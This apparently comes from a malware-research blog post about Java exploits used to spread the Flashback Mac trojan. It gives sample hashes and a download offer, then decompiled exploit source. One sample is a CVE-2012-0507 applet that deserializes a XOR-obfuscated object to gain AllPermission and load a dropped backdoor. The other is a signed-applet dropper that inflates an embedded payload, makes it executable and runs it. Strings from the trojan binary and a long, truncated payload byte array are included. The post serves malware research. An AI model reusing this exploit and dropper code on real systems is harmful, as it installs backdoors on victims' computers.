Dr. Web published BackDoor.Flashback.39 (Flashback.K-11th variant) epidemic chronology to augment their discovery of the Mac botnet "Doctor Web exposes 550 000 strong Mac botnet". In general, the Flashback OSX epidemic started on or before August 2011 (F-Secure) with variants distributed as a fake Adobe Flash player. In January 2012, Intego reported Flashback.35/ J (the 10th) which was also distributed as a fake Flash download.I am posting here 3 Java exploits used to distribute Flashback trojans:
SAMPLE 1 JAVA CVE-2012-0507 is dated April 4, and appears to be distributing Flashback.35/J - as seen from the payload
SAMPLE 2 is java_signed_applet social engineering exploit (see Michael Schierl's comment below)
and 3 is JAVA CVE-2011-3544 and are dated February 2012.
I don't know which domains distributed these exploits (let me know if you do) but perhaps we are seeing the malware distribution scheme common for Windows-targeting exploit packs
JAVA CVE-2012-0507 with Flashback.35/J payload
MD5: 0bb60cde26e022b8044149f7da138c1f
Size: 25891
JAVA 2011- 3544
MD5: d9d193658ea1555124854c3c827e4391
Size: 20989
JAVA 2011- 3544
MD5: b134edeacd2660fa08f2f5a2ea916512
Size: 45797
Download
Download all files listed above (email me if you need the password scheme) - with many thanks to anonymous donationMalware information
SAMPLE 1
JAVA CVE-2012-0507
MD5: 0BB60CDE26E022B8044149F7DA138C1F - Virustotal
First seen by Virustotal 2012-04-02 13:12:35 UTC ( 2 weeks ago )
apl.class Virustotal {} are replaced by [] to prevent issues with blogger page saving posting and AV alerts
// Source
File Name: apl.java
package a;
import
java.applet.Applet;
import
java.io.*;
import
java.util.concurrent.atomic.AtomicReferenceArray;
//
Referenced classes of package a:
// Help
public class apl extends Applet
[
public apl()
[
sobj = "8BCA2722525527347C6B4D465146094B4649400968454D4244531CB7E97FB837540E4B2527275F57272727255255272E7C6B46096F424B571CD90BB336AF91C2D82527275F572727272657545527174D4651460952534E4B0944484944525555424953094653484A4E44096653484A4E44754241425542494442665555465E8EF5F9869942472B2527267C2722465555465E5327347C6B4D465146084B4649400868454D4244531C5F575627592724";
]
public void init()
[
try
[
byte binary[] =
loadFileFromResources("/xnm");
byte arrayOfByte[] =
StringToBytes(sobj);
for(int i = 0; i
< arrayOfByte.length; i++)
arrayOfByte[i] = (byte)(arrayOfByte[i]
^ 0x27);
ObjectInputStream
localObjectInputStream = new ObjectInputStream(new
ByteArrayInputStream(arrayOfByte));
Object arrayOfObject[] =
(Object[])(Object[])localObjectInputStream.readObject();
Help arrayOfHelp[] =
(Help[])(Help[])arrayOfObject[0];
AtomicReferenceArray
localAtomicReferenceArray = (AtomicReferenceArray)arrayOfObject[1];
ClassLoader localClassLoader =
getClass().getClassLoader();
localAtomicReferenceArray.set(0,
localClassLoader);
Help.go(arrayOfHelp[0], binary);
]
catch(Exception ex)
[
ex.printStackTrace();
]
]
private static byte[]
StringToBytes(String s)
[
byte data[] = new byte[s.length()
/ 2];
for(int i = 0; i
< s.length(); i += 2)
data[i / 2] = (byte)((Character.digit(s.charAt(i),
16) << 4) + Character.digit(s.charAt(i + 1), 16));
return data;
]
private byte[]
loadFileFromResources(String fileName)
throws
IOException
[
InputStream fin =
getClass().getResourceAsStream(fileName);
byte readBuf[] = new byte[0x4b000];
ByteArrayOutputStream bout = new
ByteArrayOutputStream();
for(int readCnt
= fin.read(readBuf); 0 < readCnt; readCnt = fin.read(readBuf))
bout.write(readBuf, 0, readCnt);
fin.close();
return
bout.toByteArray();
]
public static void
main(String args[])
[
apl v = new apl();
v.init();
]
private String
sobj;
]
Help.class Virustotal
// Source
File Name: Help.java
package a;
import
java.lang.reflect.Constructor;
import
java.net.URL;
import
java.security.*;
import
java.security.cert.Certificate;
public class Help extends
ClassLoader
[
public Help()
[
]
public static void go(Help
paramHelp, byte param[])
[
try
[
byte arrayOfByte[] = zn_data;
URL localURL = new
URL("file://");
Certificate arrayOfCertificate[] = new
Certificate[0];
Permissions localPermissions = new
Permissions();
localPermissions.add(new
AllPermission());
ProtectionDomain
localProtectionDomain = new ProtectionDomain(new CodeSource(localURL,
arrayOfCertificate), localPermissions);
Class localClass =
paramHelp.defineClass("a.Time", arrayOfByte, 0,
arrayOfByte.length, localProtectionDomain);
Constructor x[] =
localClass.getConstructors();
Object objlist[] = new
Object[1];
objlist[0] = param;
Object znobj = x[1].newInstance(new Object[]
[
param
]);
]
catch(Exception localException)
[
localException.printStackTrace();
]
]
Flashback.J / BackDoor.Flashback.35 that is being dropped by the applet
File: xnm
MD5: AE7BBF2410B0EFD0CBF1410EA41E07C6
Strings ( example taken form x64 binary)
--------------------------------------------------------------------------
__PAGEZERO
__TEXT
__text
__TEXT
__symbol_stub1
__TEXT
__stub_helper
__TEXT
__cstring
__TEXT
__unwind_info
__TEXT
__eh_frame
__TEXT
__DATA
__nl_symbol_ptr
__DATA
__la_symbol_ptr
__DATA
__dyld
__DATA
__const
__DATA
__cfstring
__DATA
__data
__DATA
__common
__DATA
__LINKEDIT
/usr/lib/dyld
/System/Library/Frameworks/CoreServices.framework/Versions/A/CoreServices
/System/Library/Frameworks/IOKit.framework/Versions/A/IOKit
/usr/lib/libz.1.dylib
/usr/lib/libcrypto.0.9.7.dylib
/System/Library/Frameworks/Security.framework/Versions/A/Security
/usr/lib/libgcc_s.1.dylib
/usr/lib/libSystem.B.dylib
/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation
AWAVAUATSH
[A\A]A^A_
ATSH
0[A\
ATSH
AWAVAUATSH
8[A\A]A^A_
M{D~
ATSH
P[A\
AWAVAUATSH
w5&h
[A\A]A^A_
t&Hc
<9Ic
AUATSH
wpf9u
[A\A]
ATSH
HOME
User-Agent
/bin/sh
system.privilege.admin
prompt
icon
%s%s
%s "%s%s%s" %s "%s"
%s %s "%s"
sysctl.proc_cputype
dFd1js
IOPlatformUUID
%s|%s|%s|%s|%s|%s|%d
none
x86_64
i386
;//3F
Y/79.O
nunt
://3|UwO.79.uLk
tat_)TD
D://3
.79.
FGtat_
:://3)f
{.79.
9tat_mg
svic.
0TcchiY
/osry2-
rary)
tle U
ch|/B
lopet
plicg
ns/Xe
.app)
tentu
cOS/^
e|/Av
catii
Viruu
rier&
app|)
licar
s/iAh
irus)
tiVit
app|)
licar
s/avg
.appz
plicg
ns/Cj
av.av
Applo
ions)
PScoi
pp|/G
icato
/Pacm
Peepc
lica)
s/Mi>
oft
.app!
plic<
ns/M4
soft}
ice o
H|/Ap-
atio3
=icro.
Off4
P2011!
plic<
ns/S6
.app]
ibra
ache
va/c
Nh_keo;
ibrax
pplii
on S
rt/./
urs/S8
ud/.l9
}allo3
ilib
pathyG
chct
tenv
C+D_IN
H3_LIB
H.ES "
ers/
ed/.
*cOSX
ironBy
tlts
_INS
LIBR
chct;
tenvW
a#6all
i);ri
T/.prhY
/.dl
/.vn&
EDl/.i.
pin/s
__PAGEZERO
__TEXT
__text
__TEXT
__symbol_stub1
__TEXT
__stub_helper
__TEXT
__cstring
__TEXT
__unwind_info
__TEXT
__eh_frame
__TEXT
__DATA
__nl_symbol_ptr
__DATA
__la_symbol_ptr
__DATA
__dyld
__DATA
__const
__DATA
__cfstring
__DATA
__data
__DATA
__common
__DATA
__LINKEDIT
/usr/lib/dyld
/System/Library/Frameworks/CoreServices.framework/Versions/A/CoreServices
/System/Library/Frameworks/IOKit.framework/Versions/A/IOKit
/usr/lib/libz.1.dylib
/usr/lib/libcrypto.0.9.7.dylib
/System/Library/Frameworks/Security.framework/Versions/A/Security
/usr/lib/libgcc_s.1.dylib
/usr/lib/libSystem.B.dylib
/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation
AWAVAUATSH
[A\A]A^A_
ATSH
0[A\
ATSH
AWAVAUATSH
8[A\A]A^A_
M{D~
ATSH
P[A\
AWAVAUATSH
w5&h
[A\A]A^A_
t&Hc
<9Ic
AUATSH
wpf9u
[A\A]
ATSH
HOME
User-Agent
/bin/sh
system.privilege.admin
prompt
icon
%s%s
%s "%s%s%s" %s "%s"
%s %s "%s"
sysctl.proc_cputype
dFd1js
IOPlatformUUID
%s|%s|%s|%s|%s|%s|%d
none
x86_64
i386
;//3F
Y/79.O
nunt
://3|UwO.79.uLk
tat_)TD
D://3
.79.
FGtat_
:://3)f
{.79.
9tat_mg
svic.
0TcchiY
/osry2-
rary)
tle U
ch|/B
lopet
plicg
ns/Xe
.app)
tentu
cOS/^
e|/Av
catii
Viruu
rier&
app|)
licar
s/iAh
irus)
tiVit
app|)
licar
s/avg
.appz
plicg
ns/Cj
av.av
Applo
ions)
PScoi
pp|/G
icato
/Pacm
Peepc
lica)
s/Mi>
oft
.app!
plic<
ns/M4
soft}
ice o
H|/Ap-
atio3
=icro.
Off4
P2011!
plic<
ns/S6
.app]
ibra
ache
va/c
Nh_keo;
ibrax
pplii
on S
rt/./
urs/S8
ud/.l9
}allo3
ilib
pathyG
chct
tenv
C+D_IN
H3_LIB
H.ES "
ers/
ed/.
*cOSX
ironBy
tlts
_INS
LIBR
chct;
tenvW
a#6all
i);ri
T/.prhY
/.dl
/.vn&
EDl/.i.
pin/s
SAMPLE 2
java_signed_applet social engineering exploit (see Michael Schierl's comment below)
d9d193658ea1555124854c3c827e4391 Virustotal
First seen by VirusTotal 2012-02-10 09:01:38 UTC ( 2 months ago
{} are replaced by [] to prevent issues with blogger page saving posting and AV alerts
JavaUpdate.class Virustotal
// Source
File Name: JavaUpdate.java
package
javaupdate;
import
java.applet.Applet;
import
java.security.AccessController;
//
Referenced classes of package javaupdate:
// Payload
public class
JavaUpdate extends Applet
[
public JavaUpdate()
[
]
public void init()
[
Boolean boolean1
= (Boolean)AccessController.doPrivileged(new Payload());
]
public static void
main(String args[])
[
AccessController.doPrivileged(new
Payload());
]
]
Payload.class Virustotal
// Source
File Name: Payload.java
package
javaupdate;
import
java.io.*;
import
java.security.PrivilegedAction;
import
java.util.zip.DataFormatException;
import
java.util.zip.Inflater;
class Payload
implements
PrivilegedAction
[
Payload()
[
]
private void
saveFile(String s, byte abyte0[])
throws
IOException
[
FileOutputStream fileoutputstream = new
FileOutputStream(s);
fileoutputstream.write(abyte0);
fileoutputstream.close();
]
private byte[]
loadFileFromResources(String s)
throws
IOException
[
InputStream inputstream =
getClass().getResourceAsStream(s);
byte abyte0[] = new byte[0x4b000];
ByteArrayOutputStream
bytearrayoutputstream = new ByteArrayOutputStream();
for(int i =
inputstream.read(abyte0); 0 < i; i = inputstream.read(abyte0))
bytearrayoutputstream.write(abyte0,
0, i);
inputstream.close();
return
bytearrayoutputstream.toByteArray();
]
public Object
run()
[
try
[
Inflater inflater = new
Inflater();
inflater.setInput(loader_data);
ByteArrayOutputStream
bytearrayoutputstream = new ByteArrayOutputStream(loader_data.length);
byte abyte0[] = new byte[1024];
while(!inflater.finished())
try
[
int i =
inflater.inflate(abyte0);
bytearrayoutputstream.write(abyte0, 0, i);
]
catch(DataFormatException
dataformatexception) { }
bytearrayoutputstream.close();
byte abyte1[] =
bytearrayoutputstream.toByteArray();
saveFile(dropFile, abyte1);
String as[] = {
"chmod",
"777", dropFile
];
Process process =
Runtime.getRuntime().exec(as);
int j = process.waitFor();
String as1[] = {
"nohup",
dropFile, "&"
];
Process process1 =
Runtime.getRuntime().exec(as1);
int k = process1.waitFor();
]
catch(Exception exception)
[
exception.printStackTrace();
return Boolean.valueOf(false);
}
return Boolean.valueOf(true);
}
byte loader_data[] = {
120, -38, -19, 92, 13, 116, 91, -59,
-107, -98,
39, -53, 63, 4, -121, 40, -127, 64,
-128, -4,
-104, 68, 102, 3, 5, -53, -50, 95, 77,
78,
114, 106, 37, 118, -112, -117, -100,
120, 99, 59,
-55, 41, -95, -118, 44, -65, 68, 10,
-78, -91,
125, 122, 38, 14, 39, -128, -63, 113,
-101, -121,
-94, -42, 11, 101, -31, 116, 19, 78,
96, 105,
-101, -78, -123, -11, 66, 97, -77, 41,
-92, 38,
-55, 33, -122, 66, 26, -78, 89, -106,
-78, -39,
-64, 82, -77, -107, 32, -48, 44, 39,
-53, 111,
-120, -10, -34, 59, 35, -23, -23, 89,
-110, -45,
61, -19, 2, -69, -17, -98, 51, 119,
-34, -3,
102, -26, -50, -52, 125, -13, -34, 60,
-113, -18,
-11, -117, 103, -9, -18, 99, -116, 89,
36, -58,
74, 123, 25, 43, 98, -52, 6, -30, 117,
97,
96, -27, -112, 74, 25, 97, -51, -112,
-51, 62,
35, 48, -109, 76, 50, -55, 36, -109, 76, 50,
-55, 36, -109, 76, 50, -55, 36, -109,
76, 50,
-23, 43, 70, -65, -2, -12, -67, -77,
-16, 71,
-66, 4, 127, -28, -9, 90, 64, -98,
-128, 96,
25, 99, -3, -94, -4, 82, 72, 46, 72,
30,
79, -77, -13, -6, -122, 111, 53, -84,
92, 49,
90, -121, 116, 14, -3, -96, -98, -39,
22, -44,
-45, -38, -80, -90, 53, 71, -5, 10, 67,
3,
33, -29, 1, 68, 49, -92, 18, 1, 123,
60,
-86, -36, -93, 102, -86, 25, -11, 61,
112, 9,
-41, -9, 94, 81, 70, -74, -24, -11, 90,
89,
-81, 94, -12, 120, 34, -101, 59, -37,
67, 65,
79, 68, -19, 110, -81, 25, -83, -17,
59, -105,
115, 125, -113, 27, -28, 20, -107, 9,
125, -103,
-15, -95, 34, -113, 95, 14, -122, 101,
37, -57,
-8, -26, 77, -27, -19, -81, -79, 100,
100, 86,
112, 124, -66, -120, -86, 4, -70, 54,
-28, -103,
-17, -70, -23, 92, -33, 94, -99, 92,
-92, 107,
111, 49, -88, -9, 120, -70, -69, 54, 5,
-70,
58, 60, -127, -82, -11, -95, 28, -6,
42, 102,
112, 125, -83, 58, -39, 90, -32, -66,
122, 60,
-78, -33, -77, 94, -15, 118, -54, -71,
-57, -41,
35, -12, 109, -45, -55, -6, -15, -99,
15, 67,
-50, -67, 78, -22, -99, -83, -50, -20,
-11, 64,
118, -73, 101, -81, -113, -108, 44, 14,
-86, 116,
-9, -95, 43, -104, -70, -75, 97, 85,
-55, -85,
-81, 90, 39, -21, 109, -123, 122, -90,
101, -51,
51, -24, 45, -92, -81, 90, -24, -117, -21,
100,
-67, 62, 28, -33, -84, 44, 125, 29,
-101, -125,
29, 122, 57, 91, -33, -108, 43, -72,
-66, 90,
-99, 92, 84, -16, 62, -8, -42, -21, 23,
-118,
81, 95, -77, -48, -73, 78, 39, 23, -42,
-41,
-31, 85, -67, -7, -57, 55, 104, 24,
-33, -32,
-40, -29, 11, 117, 118, -122, -70, -14,
-23, 99,
51, -59, -3, 45, -53, 64, -59, 5, -34,
49,
-103, -9, -110, -69, 113, -7, 13, 13,
-11, -115,
-87, 53, 87, -51, -21, -122, -49, -53,
-56, 76,
39, -105, 26, 116, -51, -44, -81, 1,
81, 127,
-73, 78, -36, 13, -14, 54, -72, -111,
-43, 115,
25, -13, -117, -25, 105, 10, -66, 87,
64, -82,
-60, 10, 95, 7, -35, 22, 90, -57, 116,
74,
-102, 26, 107, 42, 89, 12, -9, 125, 20,
45,
96, -84, 14, -41, -51, -4, 108, -5, 93,
32,
-106, 56, 30, -72, 58, -70, 35, -118,
35, 24,
104, 119, -24, -106, -52, -27, 98, 28,
-41, -60,
-2, -20, 55, 71, -82, -65, -79, -31,
-44, -123,
-1, -12, -44, -91, -18, -71, 63, 65,
-101, -19,
97, -4, -103, -67, -6, 75, -80, -65,
-92, -34,
-57, 99, 17, -50, -45, 47, -26, 100,
73, 63,
-32, 18, 115, -76, 108, -114, -88, 114,
-89, -61,
29, 104, 87, -68, -54, 102, -57, 50,
124, -43,
108, 10, 41, 55, 71, 28, 75, 67, -118,
-36,
34, 43, -73, 4, 124, 114, -92, 106,
125, 10,
119, -84, -110, -107, 72, 32, -44, 21,
113, 56,
-77, 106, -24, -6, 89, -109, -43, -49,
-123, -46,
24, -3, 52, -82, -72, 33, -96, -26,
-18, -128,
-118, -46, 122, 107, -77, -12, -14, 21,
-112, -66,
119, -112, 54, -8, 124, -98, 72, 85,
77, 21,
-36, -58, 64, -69, 110, 60, -6, 118,
86, 41,
52, -86, 29, 31, 90, -43, 18, 125, -61,
81,
-10, -102, 116, 28, 58, -4, -85, -79,
-20, -75,
44, -44, -35, 5, 15, 54, 12, 63, -65,
-59,
50, 117, -52, -49, 35, -109, 76, 50,
-55, 36,
-109, 76, 50, -55, 36, -109, 76, 50,
-55, 36,
-109, 76, -6, -109, -46, 70, -26, -46,
-34, 118,
-11, -115, -100, 114, 69, 111, 43, 115,
-59, -70,
109, -38, -89, 125, -5, -91, -25, -34,
42, 114,
73, 31, -72, -76, 87, -34, -75, -70,
-6, -98,
43, 115, -11, 93, -57, -70, 63, -60,
-85, -8,
56, -8, -21, 95, 59, 20, -65, -48, -54,
-40,
105, 103, -117, 59, 54, 109, 86, 60,
-103, 116,
-74, 36, 43, -25, -98, -57, -40, -124,
25, 44,
89, 57, 7, 46, -38, 64, -87, 115, -75,
115,
-107, -77, -51, -39, -38, -30, -22, 59, 57, -69,
81, 59, -35, -88, -67, -22, -118, 22,
91, -53,
24, 115, 69, 109, 46, -83, 109, -72,
-26, -88,
75, -109, -9, -72, -76, -77, 53, -55,
-8, -67,
69, 8, 79, 126, -65, 20, -77, 113, 46,
109,
-65, 43, 54, -1, 82, 80, 4, 69, 46, 44,
-46, 14, 52, -11, -113, -88, -109, -36,
-38, 91,
80, 80, 113, 30, 34, -121, -30, -13,
-88, -28,
4, -44, -87, -122, -85, 70, -19, 16,
-126, 95,
67, -16, -50, -109, -125, 51, 16, 121,
-69, 41,
122, 101, 67, -51, -121, -17, 94, -28,
-46, 94,
119, 107, -17, -69, -75, -33, -59, 55,
97, 85,
-23, -72, 83, 58, -79, 119, 23, -44,
33, 52,
25, -1, -52, 66, -99, -72, -6, -121,
-18, 56,
-26, -118, -54, 123, -22, 53, 48, -56,
-8, -43,
52, -100, -74, 97, -41, -36, -119, 106,
113, -4,
66, -44, 28, -109, 95, -69, -47, -71,
-42, 121,
-109, -13, -37, 78, -49, 11, 7, -78, -25,
121,
-25, -55, -35, 48, 59, 119, 116, -15,
12, 104,
-41, 24, 45, 117, 105, 13, -61, 53, 67,
-1,
72, -57, -26, 79, 3, -33, -57, -58,
-95, -122,
-59, -98, 98, -58, -30, 18, 13, -7,
121, 87,
-33, -57, -55, -18, -119, -15, -65,
-121, -2, -5,
106, 39, 118, -105, -62, 100, -2, -63,
-126, -57,
-20, 96, -32, -102, 15, -95, -14, 1,
80, 25,
31, -50, -126, 6, -53, 1, 122, 10, -96,
67,
-3, -49, 124, -108, 76, 34, -18, -118,
61, -123,
-105, 80, 120, 47, -42, 95, -117, -45,
-119, -51,
-1, 28, 75, -94, -59, -69, 74, 24,
-117, -42,
-58, -99, 0, 58, -75, -125, 0, -36, 95,
-126,
-61, -100, 93, -13, -126, 91, 123, 7,
-86, -99,
-126, -31, -42, -125, 105, 46, 75, 27,
65, -67,
18, 101, 43, -56, 53, 47, -20, -27, -6,
-25,
47, 44, -57, -46, 55, -30, 111, 73, 60,
63,
-116, 121, 108, 103, 53, 118, -85, -99,
-128, -98,
31, -123, 122, -15, 5, -48, 6, -38,
111, 74,
-96, 23, -89, 43, -70, -8, 120, 41, 53,
-2,
17, -106, -67, 35, -91, -11, -81, 110,
-12, -99,
118, 69, -97, 29, -92, -58, -49, -19,
-91, 19,
-19, 87, -124, -30, 103, 37, 106, -7,
48, -76,
-36, -105, -124, -21, -8, 46, 2, 38,
-1, 37,
-87, -38, 57, -12, 25, -50, 115, -2,
42, 43,
-43, -82, 25, -30, -11, -95, -35, 115,
18, 31,
39, 13, 119, 113, 20, 106, -57, 123,
36, 52,
-14, 65, -20, -79, -43, 29, 123, 108,
8, -70,
19, 102, 116, 107, -65, -113, 43, 18,
-34, -1,
127, -89, -34, -9, 33, -116, -32, 13,
32, -3,
2, -111, 81, 37, 53, 32, 37, 15, -12,
125,
54, -89, 123, 4, 23, -46, -59, -44,
-35, -30,
89, -40, -113, 27, -82, -101, -6, 63,
84, -73,
-72, -75, -113, -30, 87, -128, -16,
-82, -62, 109,
-14, 44, -36, -27, -8, 76, 9, 109, 50,
97,
-85, 39, -103, 76, -2, -14, -47, 91,
75, 88,
-4, 36, 26, 71, -21, -57, -23, -61, 83,
16,
-101, 127, 98, 28, -17, -94, -105, 113,
11, 69,
-25, -17, -128, 91, 84, 115, 20, -79,
32, 97,
-121, 92, -79, -5, -72, -75, 78, -60,
31, 60,
3, -113, -100, 118, 112, 113, 18, -42,
-17, -124,
-17, -99, 7, 90, 19, -9, -100, 5, 77,
67,
-72, 86, 27, -25, 94, 2, 107, 21, 79,
-25,
93, 119, 30, -60, -11, -88, 91, -82,
-16, 116,
62, 2, -109, 73, 86, -2, -104, -8, 110,
-30,
-113, 18, -1, 25, -15, -57, -119, 15,
18, 127,
-126, -8, -49, -119, 63, 77, 124, 15,
-15, -67,
-60, -97, 33, -66, -113, -8, 16, -15,
-3, -60,
15, 18, 127, -98, -8, 48, -15, 23,
-119, -65,
68, -4, 48, -15, 35, -60, -113, 18, 63,
70,
-4, 85, -30, -81, 17, 127, -99, -8,
113, -68,
-117, 125, -117, 15, -30, 89, -75, 58,
1, -34,
51, 7, -32, 10, -33, 51, 79, -30, 83,
-40,
119, -80, 44, 113, 59, -84, 3, 60,
-103, 100,
80, 120, 24, -64, -60, -53, 96, -120,
1, -1,
76, -114, 96, -61, -60, 47, 8, -7, 38, 71,
-10, 34, -14, 83, 66, 20, -114, 12, 34,
114,
63, 33, 119, 115, -28, -57, -120, -12,
19, -14,
48, 71, 118, 32, 18, 33, -28, 73, -114,
-36,
-125, -120, -105, -112, 99, 28, -39, -122,
-56, 10,
66, -34, -25, -56, -19, -120, 44, 38,
-28, 124,
-119, 16, 21, -111, -81, -15, 17, 114,
100, 35,
34, -105, -14, 17, 114, 100, 29, 34,
-91, -124,
108, -28, -56, 42, 68, -2, -21, 44, 34,
-33,
-27, -120, 27, -111, -33, 18, 114, 63,
71, -106,
32, -14, 10, 33, -125, 28, -87, 69,
-28, -105,
-124, -20, -29, 72, 21, 34, -113, 17,
-14, 43,
-114, -40, 17, -7, 107, 66, 94, -25,
-56, 101,
-120, 104, -124, -60, 57, 98, 67, 100,
19, 33,
31, 113, -92, 4, 17, -103, -112, 18,
11, 33,
103, 32, 75, -76, 16, 50, -103, 35, 31,
32,
-30, 36, -60, -50, -111, 56, 34, 14,
66, 22,
112, -28, 4, 34, -45, 8, -71, -98, 35,
-57,
16, 57, -97, -112, -43, 28, 121, 17,
-111, 79,
62, 71, -92, -125, 35, 67, -120, -4,
-114, -112,
8, 71, -98, 70, -28, -97, 17, -71, -66,
-95,
-107, -75, 69, 100, -27, 90, -25, 6,
-71, 75,
101, 29, -2, 57, 29, 27, 35, -84, 113,
-123,
56, -106, 95, -24, -128, -21, -26, -96,
87, 93,
31, 82, 58, -37, -38, 26, -21, 89, -6,
-28,
-38, 29, 80, -43, -96, 92, -47, -46,
21, 80,
125, 126, -74, -87, -99, 117, -123, -4,
-35, -31,
-118, -103, -107, -111, -103, 21, 87,
50, 71, -67,
124, -117, 28, 12, -123, 101, -59, -31,
12, -121,
-125, 1, 31, 29, 88, 71, 28, 107, 124,
-95,
14, -71, -54, 27, 14, 59, -106, -122,
-70, 84,
-24, 50, -30, 104, -14, -6, 86, -76,
-16, 2,
-58, -4, -86, 26, 94, -24, 112, 124,
-67, -74,
106, -34, -126, -86, -102, -71, -41,
85, -51, -87,
-87, 113, 108, -12, -123, -70, -95,
-78, -30, 96,
14, -75, 51, -20, -88, 82, 59, -28, 78,
-79,
15, -29, -101, 102, -86, -56, 43, 4,
86, -63,
-78, 127, -37, -85, 21, 73, -86, -56,
-56, 69,
116, 70, 95, -60, -90, -120, 95, 63,
-34, -65,
-124, 73, -8, -37, -15, 43, 107, -118,
9, -72,
40, -91, -1, -42, -107, 76, -22, -79,
73, -74,
-14, -46, -78, 1, 40, -103, 39, -6, 91,
-11,
113, -110, 40, -11, 123, 34, -77, 98,
-77, 11,
108, -33, -79, 88, 81, -11, -8, 18,
-21, 120,
-56, -6, 74, -73, -105, -60, -118, -65,
103, -3,
126, 17, -74, -61, -97, -64, 74, 62,
-31, -19,
-2, -50, -110, -81, -99, 45, -85, -35,
31, -6,
93, -78, 74, -4, 126, -19, 23, -7, -83,
34,
-33, 46, -14, 7, 69, 62, 40, -14, -3,
34,
63, 38, -14, -1, 16, -7, -57, 34, 31,
55,
77, -40, 88, -28, 85, 34, -81, 19, -7,
74,
-111, 119, -120, -4, 22, -111, 111, 19,
-7, 15,
69, -2, 51, -111, -17, 19, -7, 17,
-111, -65,
37, -14, -45, 34, 47, 17, -65, -105,
79, 17,
-7, -43, 34, 95, 36, -14, -27, -45, 83,
-65,
51, 15, 121, -110, 119, 48, 86, 38,
-14, -44,
90, 24, 22, -65, 123, 14, -119, 124,
-113, -56,
83, -65, -121, -90, 104, -72, -108,
-25, -87, -33,
-25, -115, -122, 78, -107, 119, -120,
-14, 113, 121,
-54, -17, 18, -27, 23, -100, -29, -3,
57, 37,
-22, 79, 16, -65, -69, 39, 33, 125,
106, 126,
78, -101, 100, -110, 73, 38, -103, 100,
-110, 73,
38, -103, 100, -110, 73, 38, -3, -65,
-89, -119,
117, -98, -101, -105, 46, 115, -75,
-74, 54, 11,
47, -64, 26, 79, 13, -5, 115, 101, -54,
-64,
36, 40, 104, 92, -47, -28, -115, -88,
-78, -46,
28, 82, -44, 122, 121, -67, -73, 59,
-88, -78,
-127, -117, -22, 60, -24, -28, -18,
-11, -35, -20,
-15, -7, 111, -10, 108, -24, -10, 42,
29, 76,
-79, 13, -44, -95, 119, 42, -9, 126,
111, 15,
116, 117, -56, 10, 83, -40, -64, 100,
-84, -68,
116, -39, -46, 80, 23, -76, -24, 82,
91, -56,
67, 121, 105, -48, 27, -119, -84, -108,
-41, -53,
-118, -36, -27, -109, 89, -17, -80,
101, -56, 50,
101, -128, 6, -30, 12, 6, 67, 62, -81,
26,
82, 82, -35, 41, -77, 7, 104, -100, 74,
53,
-116, -108, 15, -76, 73, -114, 68, -68,
27, -28,
-91, -118, -20, 85, -27, -107, -14, 95,
116, -53,
17, 24, 22, 83, 106, -115, 53, 90, 100,
-43,
37, 123, 97, 36, -53, 2, 114, -80, 99,
-107,
55, -40, 45, 99, -67, 58, -86, -73, 18,
74,
96, 56, -78, -73, -109, 43, 90, 22, 82,
-80,
-87, 78, -97, 107, 114, 118, -67, 21,
97, -71,
11, -15, 102, 3, -114, 87, -120, -81,
17, 120,
80, -10, 70, -88, -93, 117, 4, -120,
57, 83,
39, -85, 3, -86, 127, 41, 7, -80, -126,
95,
87, -31, 122, 89, -43, -107, -124, -87,
-92, 109,
-91, 59, -45, 46, 83, -40, 3, -9, -90,
113,
-59, -118, -10, -115, -78, 79, -43,
117, -41, 43,
17, -66, 82, -34, 16, -120, -88, -54,
-26, -122,
46, 96, -68, -7, -46, 101, -51, 10, 30,
-107,
-87, -101, -79, -34, -74, 28, -11,
-106, 41, -95,
-50, 102, -81, -22, -57, -14, 1, 9,
111, -15,
-14, 22, 24, 81, 67, -113, -20, -21,
86, -67,
-19, 65, 57, 85, -8, 0, 21, 122, 100,
69,
9, 41, 40, -17, -110, 12, -21, 97, -67,
55,
16, -60, -126, -35, 88, -32, -13, 119,
-122, -56,
54, -125, 40, -55, 61, 1, 50, -20, 30,
20,
-42, -5, -126, 33, 62, -18, 33, 18, 67,
-62,
-70, -61, 36, 109, 82, 2, 42, 21, 30,
65,
-79, -45, -117, -53, 2, -59, -41, 72,
-108, 59,
125, 97, -102, -54, -101, 66, -116,
-56, -92, 56,
-114, 98, 68, -18, -12, -92, 117, -97,
74, 33,
41, -11, 31, 19, 16, 6, 83, -86, -21,
-55,
104, 22, -108, 85, 47, -75, -33, 70, 2,
57,
-48, -110, 33, 80, -20, -18, 10, 6,
-70, 110,
102, 3, -87, 7, 70, -14, 120, 58, -3,
48,
21, 52, -116, -20, -15, -45, -6, 98,
-105, 88,
-2, -40, -49, -27, 77, -96, 113, 17,
-28, 75,
26, -68, -28, 6, 111, -91, 51, 36, 91,
-6,
28, 106, 10, -27, 82, -6, -56, 105,
-98, 65,
94, 101, -112, 123, -72, -100, 118,
-87, -65, -37,
32, -17, 48, -56, 63, 49, -56, -5, 13,
-14,
-85, 6, -7, 61, 46, -89, -19, 112, -42, 32,
-49, -112, -78, -27, 90, 46, -89, 67,
75, -106,
-109, -100, 113, -7, 15, 27, -54, 55,
27, -28,
40, -81, -97, -106, 31, 52, -108, -1,
-56, 32,
-1, -83, 65, 126, -46, 32, -17, 53,
-56, -5,
13, -29, -7, 23, 46, -89, -19, -7, 14,
23,
50, -9, -35, -110, -35, -66, -52, 32,
-37, 12,
-14, 20, -125, 60, -53, 32, 95, 107,
-112, 23,
24, -28, 69, 6, -71, -34, 32, -69, 45,
-39,
-10, 105, -106, 40, -74, -21, -126,
-80, -56, 7,
68, 110, 17, 103, -109, 88, 49, 21,
103, -123,
71, -113, 24, -122, 113, -98, 56, -105,
-60, -40,
6, -12, 55, 31, 47, -50, 33, 113, 21,
78,
-124, 116, 33, -29, -25, -40, -109, 33,
93, 12,
-23, 18, -58, -29, 18, -16, -4, 26, 99,
103,
-90, -29, 125, 103, -4, -68, -4, 10,
-58, 99,
45, 68, 44, 68, 29, -90, 73, -116, -57,
113,
92, -58, 50, 126, -20, 95, -64, 88, 88,
-82,
39, -70, -48, 94, 51, -10, 46, 51, -10,
-2,
50, 122, 103, 25, -67, -89, -24, 118,
-109, 2,
-5, 72, -82, 29, 36, -49, -34, 49, 106,
-41,
24, 115, -69, -56, -69, 79, -28, -34,
32, -58,
-34, -20, -45, 123, -57, -24, 77, 35,
-57, 103,
-123, -40, 64, -8, -50, -111, -38, 50,
-60, 94,
-111, -38, 36, 114, 126, 54, -28, -8,
-88, -55,
-3, 57, -109, -38, 91, 82, -101, 74,
106, 55,
